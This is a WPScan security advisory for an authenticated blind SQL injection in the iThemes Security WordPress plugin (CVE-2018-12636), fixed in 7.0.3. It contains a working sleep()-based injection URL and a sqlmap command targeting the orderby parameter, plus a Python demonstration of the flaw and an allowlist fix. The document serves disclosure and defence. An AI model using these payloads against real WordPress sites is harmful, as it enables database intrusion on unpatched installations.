iThemes Security <= 7.0.2 - Authenticated SQL Injection



Description
The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page.

Vulnerability description:

iThemes Security is vulnerable to time-based (blind) SQL injection on its logs page.

The orderby request parameter is the injection point: it is copied into the backend variable $sort_by_column and concatenated into the ORDER BY clause without escaping or validation. Because a column identifier cannot be bound as a prepared-statement parameter, the only safe handling is to check each requested column against a list of known sortable columns.

Privileges required: Admin user (the logs page is only reachable by authenticated administrators).

Technical details:

File: better-wp-security/core/admin-pages/logs-list-table.php
Line 271: if ( isset( $_GET['orderby'], $_GET['order'] ) ) {
Line 272: $sort_by_column = $_GET['orderby'];

File: better-wp-security/core/lib/log-util.php
Line 168: $query .= ' ORDER BY ' . implode( ', ', $sort_by_column );

Proof of Concept
The following GET request, when opened by an authenticated admin, appends a subquery to the ORDER BY clause; the response is delayed by about 10 seconds because MySQL evaluates sleep(10) while sorting the log rows:

http://localhost/wordpress/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0

Using sqlmap (the * after remote_ip marks the injection point, --technique T restricts testing to time-based blind injection, and the admin session cookies must be supplied because the page requires authentication):

sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3
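To show why the orderby handling above is exploitable and what the allowlist fix looks like, here is an added example that is not part of the advisory or the plugin's code. It reproduces the pattern in Python against an in-memory SQLite table (a constructed stand-in for the plugin's log table; the column set is an assumption). Since SQLite has no sleep() function, the example registers a sleep() user function that records its argument instead of blocking, so the same payload as the PoC above can be run and its execution observed; a hardened builder rejects the payload because the injected term is not a known column.

```python
import sqlite3

# Constructed stand-in for the plugin's log table; the columns are an
# assumption for this example, not iThemes Security's real schema.
SAMPLE_ROWS = [
    (1, "malware", "10.0.0.3"),
    (2, "malware", "10.0.0.1"),
    (3, "brute_force", "10.0.0.2"),
]

# Allowlist of sortable columns and directions for the hardened builder.
SORTABLE_COLUMNS = {"id", "module", "remote_ip"}
ORDER_DIRECTIONS = {"asc", "desc"}

# The orderby value from the advisory's PoC URL, URL-decoded.
PAYLOAD = "remote_ip,(select*from(select(sleep(10)))a)"


def _connect(sleep_log):
    """In-memory SQLite DB with a sleep() UDF that logs its argument
    instead of blocking, standing in for MySQL's sleep()."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, lambda n: sleep_log.append(n) or 0)
    conn.execute("CREATE TABLE logs (id INTEGER, module TEXT, remote_ip TEXT)")
    conn.executemany("INSERT INTO logs VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_query(orderby, order):
    """Mirrors the unescaped pattern: request values are split and joined
    straight into ORDER BY, so any SQL expression is accepted."""
    sort_by_column = orderby.split(",")
    return ("SELECT id FROM logs WHERE module = 'malware' ORDER BY "
            + ", ".join(sort_by_column) + " " + order)


def safe_query(orderby, order):
    """Identifiers cannot be bound as parameters, so each requested column
    and the direction are checked against an allowlist before use."""
    sort_by_column = [c.strip() for c in orderby.split(",")]
    for column in sort_by_column:
        if column not in SORTABLE_COLUMNS:
            raise ValueError(f"rejected sort column {column!r}")
    if order.lower() not in ORDER_DIRECTIONS:
        raise ValueError(f"rejected sort order {order!r}")
    return ("SELECT id FROM logs WHERE module = 'malware' ORDER BY "
            + ", ".join(sort_by_column) + " " + order.upper())


def is_rejected(orderby, order):
    """True if the hardened builder refuses the given request values."""
    try:
        safe_query(orderby, order)
    except ValueError:
        return True
    return False


def run(query):
    """Execute the query; return (ordered row ids, sleep() arguments seen)."""
    sleep_log = []
    conn = _connect(sleep_log)
    try:
        ids = [row[0] for row in conn.execute(query)]
    finally:
        conn.close()
    return ids, sleep_log


def demo():
    ids, sleeps = run(vulnerable_query(PAYLOAD, "asc"))
    print("vulnerable build executed sleep() with:", sleeps, "rows:", ids)
    print("hardened build rejects payload:", is_rejected(PAYLOAD, "asc"))
    print("hardened build, valid input:", run(safe_query("remote_ip", "asc"))[0])


if __name__ == "__main__":
    demo()
```

The vulnerable builder evaluates the attacker's subquery during sorting, which on MySQL is exactly the 10-second delay the PoC relies on; the hardened builder never lets the term reach the database.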

Affects Plugin

Fixed in version 7.0.3

References

CVE 2018-12636
URL https://plugins.trac.wordpress.org/changeset/1894782/better-wp-security

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Çlirim Emini
Submitter Website https://www.sentry.co.com/
Views 1580
Verified No
WPVDB ID 9099

Timeline

Publicly Published 2018-06-22
Added 2018-06-25
Last Updated 2018-08-29

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.